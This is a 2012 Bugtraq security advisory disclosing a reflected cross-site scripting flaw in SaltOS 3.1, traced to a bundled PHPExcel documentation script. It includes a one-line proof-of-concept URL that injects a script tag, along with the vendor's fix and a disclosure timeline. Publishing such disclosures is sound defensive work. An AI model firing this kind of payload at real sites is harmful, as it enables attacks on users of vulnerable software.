[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201208230643.q7N6hCnf013397@sf01web2.securityfocus.com>
Date: Thu, 23 Aug 2012 06:43:12 GMT
From: sschurtz@...ksecurity.de
To: bugtraq@...urityfocus.com
Subject: SaltOS 3.1 Cross-Site Scripting vulnerability
Advisory: SaltOS 3.1 Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2012-018
Author: Stefan Schurtz
Affected Software: Successfully tested on SaltOS 3.1 r4908
Vendor URL: http://www.saltos.net
Vendor Status: fixed
==========================
Vulnerability Description
==========================
SaltOS 3.1 is prone to a Cross-Site Scripting vulnerability, because of using PHPExcel 1.7.7 (latest version)
==================
PoC-Exploit
==================
http://[target]/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ '><script>alert('xss')</script>
=========
Solution
=========
Unused directories (docs, examples and tests directories from the PHPExcel/Shared/JAMA directory) are removed.
Update to the latest version (Fixed in the nightly build r5696 from 2012-08-14).
====================
Disclosure Timeline
====================
13-Aug-2012 - developer informed
13-Aug-2012 - feedback from developer
14-Aug-2012 - fixed by developer
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-018.txt
Powered by blists - more mailing lists